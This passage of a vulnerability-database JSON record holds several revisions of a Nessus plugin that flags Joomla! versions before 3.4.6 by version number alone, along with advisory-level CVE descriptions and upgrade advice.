{"idList": ["PACKETSTORM:135100", "PACKETSTORM:134949"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-28T20:32:08", "value": 7.4, "vector": "NONE"}}, "hash": "094bc0fb21c1ba6481471e7897cebbd9a89076965190d9a76657691444c158f2", "hashmap": [{"hash": "83d85f0b2082533b5c390c185dd3e8ce", "key": "reporter"}, {"hash": "a67b72711b557eaa1cb901087a882768", "key": "description"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "f0c058e0d7789cc02544fb074c2ebeb8", "key": "href"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "6d1c534dc9bfdb4206c06293dcccafda", "key": "cpe"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "491ea03c294b99ddda96efedc9438a01", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/87416", "id": "JOOMLA_346.NASL", "lastseen": "2019-10-28T20:32:08", "modified": "2019-10-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/13 18:56:27\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 
79203\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! 
version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = 
\"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 27}, "differentElements": ["modified"], "edition": 12, "lastseen": "2019-10-28T20:32:08"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version number, the Joomla! installation running on the remote web server is prior to 3.4.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper sanitization of session values. 
An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists due to HTTP requests to com_templates not requiring multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a specially crafted link, to cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper sanitization of user-supplied input via the XML install file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 3, "hash": "8e8c5c55708366fb006e740ee1f2d4fa9aecd98cb98ec6dd76aecc95218726d9", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "be65a2733991b80a705086c8a61c5d46", "key": "modified"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "8af1ff68d7523a7291f605d1fac9f6af", "key": "sourceData"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "da65470e1074a8a2b67a229e55366e45", "key": "href"}, {"hash": "df36c3dd76c887d5754a53e4a353a037", "key": "description"}], "history": [], "href": 
"https://www.tenable.com/plugins/index.php?view=single&id=87416", "id": "JOOMLA_346.NASL", "lastseen": "2016-12-01T01:35:45", "modified": "2016-11-30T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/11/30 17:17:31 $\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_osvdb_id(\n 131679,\n 131680,\n 131681,\n 131682\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla%21\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": 
"Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2016-12-01T01:35:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:joomla:joomla\\!"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version number, the Joomla! installation running on the remote web server is prior to 3.4.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper sanitization of session values. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists due to HTTP requests to com_templates not requiring multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a specially crafted link, to cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper sanitization of user-supplied input via the XML install file. 
(CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "3502eb80206282e2330c51cae895e76840c483c33191a12fdb837e89a187f694", "hashmap": [{"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "0f5e1fded7e98cbb2030291715b3eb9d", "key": "modified"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "02d316ee0fb17568bed32b0e4cb01c65", "key": "sourceData"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "6d1c534dc9bfdb4206c06293dcccafda", "key": "cpe"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "da65470e1074a8a2b67a229e55366e45", "key": "href"}, {"hash": "df36c3dd76c887d5754a53e4a353a037", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=87416", "id": "JOOMLA_346.NASL", "lastseen": "2017-10-29T13:37:31", "modified": "2017-05-19T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2017/05/19 13:58:07 
$\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_osvdb_id(\n 131679,\n 131680,\n 131681,\n 131682\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. 
(CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! 
< 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 23}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2017-10-29T13:37:31"}], "edition": 15, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "6d1c534dc9bfdb4206c06293dcccafda"}, {"key": "cvelist", "hash": "871c430e5e5dff2841813e7218c22d5c"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "a67b72711b557eaa1cb901087a882768"}, {"key": "href", "hash": "f0c058e0d7789cc02544fb074c2ebeb8"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "6f971b8a5752c9a4a44306db39282683"}, {"key": "published", "hash": "fe431d002c3234b19fc0c7c4c23ca999"}, {"key": "references", "hash": "3bbb9f1695f78e751a165135d1e6933f"}, {"key": "reporter", "hash": "f82feb6b55f329a4801a7908bc18a9d6"}, {"key": "sourceData", "hash": "9c95562c2b2059addaa39c0c8952b1ea"}, {"key": "title", "hash": "e7b4b8d462ef6ff4a4efa192ec0c3507"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "fd9db7aa3b5a8ef9b937218a794224207109f0c085e067d15e2afbabe4772783", "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-8565", "CVE-2015-8563", "CVE-2015-8564", "CVE-2015-8562"]}, {"type": "freebsd", "idList": ["A9F60CE8-A4E0-11E5-B864-14DAE9D210B8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105486", "OPENVAS:1361412562310105487"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "JOOMLA_OBJECT_INJECTION.NASL", "JOOMLA_347.NASL"]}, {"type": "joomla", "idList": ["JOOMLA-635", "JOOMLA-633", "JOOMLA-634", "JOOMLA-630"]}, {"type": "canvas", "idList": ["JOOMLA_SESSION_UNSERIALIZE"]}, {"type": "saint", "idList": ["SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A", "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", 
"SAINT:150A052478728FE6FC97F9B52382B525"]}, {"type": "exploitdb", "idList": ["EDB-ID:38977", "EDB-ID:39033"]}, {"type": "zdt", "idList": ["1337DAY-ID-24758", "1337DAY-ID-24763"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135100", "PACKETSTORM:134949"]}, {"type": "threatpost", "idList": ["THREATPOST:9475C86517671FDF8D35E7E89FB91463"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}], "modified": "2019-12-13T07:51:53"}, "score": {"value": 7.4, "vector": "NONE", "modified": "2019-12-13T07:51:53"}, "vulnersScore": 7.4}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. 
(CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! 
version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", 